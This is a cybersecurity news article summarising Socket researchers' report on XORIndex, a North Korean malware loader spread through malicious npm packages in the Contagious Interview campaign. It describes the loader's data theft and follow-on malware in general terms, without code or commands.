North Korean threat actors behind the notorious Contagious Interview campaign have expanded their operations with a new malware loader, according to Socket researchers.
The loader XORIndex has accumulated over 9000 downloads from June to July 2025, with the principal targets being developers, job seekers and individuals believed to possess cryptocurrency or sensitive credentials.
XORIndex is used to collect data and run second-stage malware, ultimately resulting in cryptocurrency theft.
These downloads are part of a broader campaign, in which attackers published an additional 67 malicious packages to the npm registry – a database of open-source JavaScript packages.
These packages have been collectively downloaded more than 17,000 times, with 27 remaining live on the npm registry, the researchers said.
XORIndex was incorporated into 28 of the new packages, with others deploying the previously discovered malware loader HexEval, which had more than 8000 additional downloads.
The new packages were discovered after Socket observed the threat actors publishing 35 malicious packages on the npm registry in June 2025. Each of these packages contained HexEval.
Socket has submitted takedown requests for the remaining packages to the npm security team and has petitioned for the suspension of the associated accounts.
The researchers said that the development of XORIndex reflects Contagious Interview actors’ ongoing investment in stealthier, more resilient software supply chain malware, capable of full system compromise.
“We expect the North Korean threat actors to reuse existing loaders like HexEval and XORIndex, while introducing new obfuscation techniques and loader variants,” the researchers wrote in the blog dated July 14, 2025.
Multi-Function Malware Loader
The researchers observed XORIndex contained in 28 malicious npm packages distributed across 18 npm accounts registered using 15 distinct email addresses.
Similarly to HexEval, the malware performs a range of functions for the attackers.
Upon installation, XORIndex collects local host telemetry, including hostname, current username, operating system type and external IP address.
This information is exfiltrated to hardcoded command and control (C2) infrastructure.
The malware then loads BeaverTail, a staple second-stage malware used in the North Korean Contagious Interview attacks.
BeaverTail scans for and collects data from dozens of known desktop wallet directories and browser extension paths. This information is designed to enable the compromise of cryptocurrency wallets, including wallet databases, browser extension local storage, macOS keychain credentials, Solana IDs and wallet-related JSON files.
The data is exfiltrated to a hardcoded IP-based HTTP endpoint, before being deleted upon successful upload.
BeaverTail then attempts to load InvisibleFerret, a known third-stage backdoor linked to this operation.
Ongoing Contagious Interview Campaign
The Contagious Interview campaign was first reported in November 2023, since evolving with multiple malware versions surfacing.
The campaign has been linked to the notorious North Korean state-sponsored group Lazarus.
The attackers exploit job search platforms such as LinkedIn to pose as prospective employers with job opportunities for developers.
To make their deception convincing, they set up fake websites and distribute malicious software under the guise of professional development tools.
Victims are tricked into downloading malicious software disguised as legitimate tools on open-source repositories such as GitHub and npm.
